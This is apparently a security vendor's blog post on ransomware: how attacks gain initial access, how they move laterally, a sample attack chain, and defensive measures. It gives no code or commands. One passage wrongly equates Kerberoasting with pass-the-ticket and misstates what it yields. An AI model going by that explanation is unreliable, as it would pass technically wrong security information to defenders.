How To Detect and Stop a Ransomware Attack

Share :

Let’s start with the good news.

Law enforcement organizations around the world have stepped up their efforts to find, stop, and arrest ransomware operators, shut down dark web markets, and close crypto mixers and tumblers that help threat actors launder their funds. Plus, governments and organizations have shown a new resilience against paying ransoms, with the White House recently announcing an alliance of 40 countries who have made a commitment to never pay a ransom, and recent reports from blockchain analysis firm, Chainalysis, showing a declining percentage in ransoms paid by victim organizations. All of this makes ransomware a more dangerous, and less lucrative, endeavor for cybercriminals. So, that means rates of ransomware are declining, right?

That’s the bad news.

According to IBM, nearly a quarter of all cyber attacks are now ransomware attacks. And the median initial ransom demand associated with incidents investigated by Arctic Wolf® Incident Response in 2023 grew to $600,000 USD — a 20% increase over last year’s figure of $500,000.

Even worse, the above efforts, rather than deterring threat actors, seem to have instead inspired them to innovate. Double- and triple-extortion models are becoming the norm, rather than the exception and, according to the FBI, while some groups were once unwilling to attack high-value, high-damage targets like hospitals or nuclear power plants, those same groups have publicly announced those targets are now fair game.

According to Arctic Wolf Labs in their 2024 Threats Report: “As the saying goes, no animal is more dangerous than when it’s cornered, and right now ransomware groups are feeling cornered. We expect to see more ambitious ransoms, stricter negotiations, more aggressive naming and shaming, and further experimentation with new tactics throughout 2024.”

With ransomware attacks growing at an exponential rate, and new innovations making the cyber threat landscape more dangerous than ever how can organizations stay safe? The answer lies in better threat detection and response capabilities that help you properly detect and stop a ransomware attack.

How Ransomware Attacks Begin

Historically, too much faith has been placed on firewalls, intrusion detection systems, and other perimeter defenses to stop ransomware. The idea of keeping the bad guys at the gates is enticing, but in the modern cybersecurity world of cloud environments, identity-based applications, and hybrid networks, it’s also a pipe dream. Organizations need to look for a new path forward, because attempting to stop ransomware and other malware at the network boundaries will never be enough.

If an organization is going to be truly prepared to combat the scourge of ransomware, they need to understand how these attacks begin, and how threat actors gain initial access to their environment. For the past several years, the overwhelming majority of ransomware attacks have begun in one of two ways:

External Exposure
According to data analyzed by Arctic Wolf Labs, in over two-thirds of the ransomware cases we observed, threat actors gained initial access to victim environments through external exposure — a system exposed, whether knowingly or inadvertently, to the public Internet. In 2023, threat actors leveraged external remote access in 39% of cases, while other forms of external exploits, including known vulnerabilities and zero-days, accounted for 29%.

External remote access typically involved identity-based attacks aimed at breaching an organization’s identity and access management (IAM) system — the governance, control, and monitoring of users’ identities and access within a system or network. External remote access attacks can take a few different forms, including:

  • Compromising servers with Remote Desktop Protocol (RDP)
  • Compromising servers with Microsoft Active Directory
  • Using valid credentials purchased from an initial access broker (IAB) on a dark web marketplace

External exploits, however, involve leveraging either a known vulnerability or a zero-day vulnerability to gain access to an environment. While zero-days get all the headlines, they make up a small percentage of cases — just 3.4% of the non-BEC incidents investigated by Arctic Wolf. The true risk lies in the known, unpatched vulnerability.

According to the 2024 Arctic Wolf Labs Threats Report , more than a quarter of non-business email compromise (BEC) incidents we investigated — of which the vast majority were ransomware — exploited a known (i.e., not a zero-day) vulnerability. In theory, an effective patching program could have mitigated the attack or at least forced the threat actor into a different course of action.

User Action
While comprising a smaller section of attacks, user action still accounts for nearly one-quarter of all ransomware attacks’ initial access vectors. User action, simply put, is exactly what it sounds like: one of your employees making a single mistake that puts your organization at risk. That could be anything from visiting a malicious website to opening a booby-trapped file in a phishing email, which allows the threat actor to gain access to your environment. The team at Arctic Wolf Labs has identified four major ways that user action can lead to a ransomware attack:

  • Phishing
    A user clicks on a malicious link and is tricked into sharing credentials or downloading and executing a malicious attachment within an email.
  • Previously compromised credentials
    The threat actor uses credentials that are known to be part of a data breach or credential dump — but that have not yet been deactivated by the victim organization (i.e., user inaction).
  • Malicious software download
    A user falls prey to a drive-by attack or downloaded software containing hidden malicious functionality.
  • Other social engineering
    A user is tricked by a tech support scam or some other social engineering attack besides phishing.

It’s important to note that hardening your environment to protect against ransomware will pay deep dividends against all forms of cyber attack, as the same initial access attack vectors are used in many other forms of cyber attack, including BEC and malware attacks.

How Ransomware Attacks Spread

Once a threat actor has gained initial access to your environment, they immediately begin the next stage of their attack: lateral movement.

Lateral movement consists of tactics threat actors use to move into different parts of the system or go deeper into the system to lock-up and/or exfiltrate data and execute their ransomware attack.

Lateral movement is a much more advanced technique, one that requires skill at evading security solutions by pivoting rapidly and employing multiple paths to value. Ransomware typically enters through a single compromised system (e.g. a user endpoint such as a desktop, or an exposed Internet-facing server). It then sends a message to a command-and-control (C2) server, at which point, it will be commanded to encrypt specific file types that may contain sensitive business data. Once this process is set in motion, all bets are off. Here are a few common lateral movement techniques employed by threat actors in ransomware attacks to reach that C2 stage.

When a user creates a password in a Windows environment, it is hashed and stored in one of several places, including Active Directory. In this lateral movement technique, the threat actor combs through active memory to steal a user’s password hash and “passes” it through the system for authentication, essentially creating a new user session on the same network.

Fileless Malware
Even organizations that are diligent about using next-generation firewalls and applications whitelists will miss these “zero-footprint” fillers attacks, as they never land on the hard drive but instead are stored in a system’s memory, making them difficult to detect and adept at moving quickly and spreading widely. PowerShell is often used to inject code into a currently running executable, causing the malware to be executed inside a known good process. Or code can be loaded directly into memory and executed from there. Typical persistence is having the persistence mechanism inside the registry that is then executed at startup via a service so no part of the malware is ever stored inside of a file avoiding antivirus detections.

Kerberos is an authentication service protocol found in Windows environments. Meant to secure users and devices using secret keys rather than plaintext passwords, it uses encrypted tickets passed between the user and the authentication service for verification. In Kerberoasting, also known as pass-the-ticket, the threat actor steals one of these tickets and uses specialized hacking tools to decrypt it, revealing the user’s password and granting them access to the user’s account.

What a Ransomware Attack Looks Like in the Real World

The experts in our Triage Security and Incident Response Teams have significant experience responding to and stopping ransomware attacks. As such, they’re able to paint a clear picture of how a typical ransomware attack can unfold:

Step 1
The threat actor sends a phishing email to a user. That user opens the email and clicks on the malicious link, executing the malware attached to the email.

Step 2
The malware “calls home” to the threat actor’s command and control (C2) server, copying code into memory and executing it.

Step 3
The malware maintains persistence in the environment via a legitimate service that now executes code hidden inside a registry key (fileless malware).

Step 4
The threat actor dumps the hashes out of the system’s memory via LSASS dump (credential access). Using the hash for an admin account used by an IT employee the threat actor crafts a fake Kerberos ticket to get the hash of the enterprise admin.

Step 5
The threat actor uses the hash of the Enterprise Admin account using pass-the-hash (lateral movement) to do a DCSync attack (privilege escalation). A DCSync attack impersonates a Domain Controller — servers used in Microsoft environments used to authenticate network security requests from around the network. In this case, the DCSync attack grants the threat actor the hashed passwords of all users in the domain. From that point, they have full access to the environment and are ready to deploy their ransomware.

How to Detect and Stop a Ransomware Attack

By the time the ransom note appears on computer screens across your organization, it’s already too late to stop the attack. Proper detection and mitigation of a ransomware attack must begin further up the kill chain.

Stage 1: Initial Access
A major part of preventing a ransomware attack at this stage comes down to keeping your focus on your cybersecurity fundamentals.

  • User Training: A security awareness training program that uses frequent touchpoints, current topics, and shame-free phishing simulations can help prepare your employees to recognized and neutralize social engineering attacks like phishing, drastically reducing user action errors in your organization and keeping threat actors from gaining a foothold in the first place.
  • Vulnerability Management: Proactively managing risk by patching and remediating known vulnerabilities can narrow your attack surface and make it more difficult for threat actors to find a viable path into your environment.
  • Holistic Visibility: A lack of visibility allows ransomware attacks to go unnoticed and cause significant damage to organizations. Log monitoring is critical to detect attacks in their earliest stages. This includes logs from intrusion detection systems (IDS), network detection and response (NDR) systems, endpoint detection and response (EDR) solutions, firewalls, identity and access management (IAM) systems, email services (e.g., to monitor for changes in access and the creation of filtering rules), and the cloud-hosted services that extend your organization’s environment beyond your own infrastructure.
  • Identity Controls: Identity is a major battleground in modern cybersecurity. According to Verizon’s 2023 Data Breach Investigations Report, 74% of all breaches involve the human element, with people involved either through error, privilege misuse, social engineering, or stolen credentials — the latter three of which directly involve the management (and mismanagement) of user identities. Threat actors are adept at finding and leveraging credentials that allow them to log into services and move unnoticed around victim environments. Multi-factor authentication is an effective way to harden defenses; for example, effective MFA can help to prevent the account takeovers behind some ransomware attacks.

See initial access in action with our ransomware timeline.

Stage 2: Lateral Movement
If threat actors are able to breach your environment and gain initial access, every second counts. At this stage, it’s vital that you can quickly detect unusual activity and respond to it before they are able to inflict damage.

Managed Detection and Response
It’s here that 24×7 monitoring, detection, and response by trained security personnel is crucial. Without the ability to monitor your entire environment — endpoints, network and cloud — in real-time, threat actors have the advantage.

Many security teams turn to tools to aid in this monitoring. Unfortunately, alert fatigue is a common problem, borne of many false positives triggered by these existing security tools. And, while artificial intelligence (AI) and machine-learning (ML) can aid in separating the signal from the noise, human expertise is still essential to elevating the actionable alerts out of the pile.

Also, as organizations add more tools, tech sprawl becomes a real problem. While malware with known signatures will be caught in these perimeter defenses, new strains of malware or suspicious file traffic might not trigger an alert if the tools have not been updated. There may be billions of daily networks events, and thousands of potentially harmful alerts. Organizations need a central platform to ingest these alerts and cross-correlate them using human experts to determine which to investigate.

That’s where managed detection and response comes in. The best solutions work with your existing technology stack to discover and profile assets and collect data and security event observations from multiple sources, providing broad visibility, 24×7 monitoring, and advanced threat detection.

Incident Response
Ransomware incident response takes many different forms, depending on at what point the team is engaged. A good IR provider can handle everything from containing the attack and locking out the threat actor, to restoring systems and even threat actor negotiations.

A ransomware incident response plan, however, should include more than just the steps taken in the immediate aftermath of an attack. It should also include remediation of the root point of compromise to prevent future exploitation, a thorough analysis with your IR team of the forensic findings to harden your security posture against other attacks, and additional monitoring against re-entry attempts post-breach.

Incident Response is available from a variety of companies, each offering a range of services directly to organizations or through cyber insurance carriers. Be sure to select a full-service vendor with in-house expertise to provide comprehensive digital forensics, data recovery services, and ransomware experience. Only full-service providers eliminate the threat actor’s access to the environment, analyze the cause and extent of the attack, and restore the business to normal pre-incident operations.

See how Concierge Security® experts within Arctic Wolf’s industry-leading Security Operations triage workflow investigated, escalated and remediated a ransomware attack on a local government organization.

Access the intelligence and insights developed by Arctic Wolf Labs over the past year as we ingested trillions of weekly observations within thousands of unique environments in the 2024 Arctic Wolf Labs Threats Report.


Arctic Wolf

Arctic Wolf

Arctic Wolf provides your team with 24x7 coverage, security operations expertise, and strategically tailored security recommendations to continuously improve your overall posture.
Share :
Table of Contents
Subscribe to our Monthly Newsletter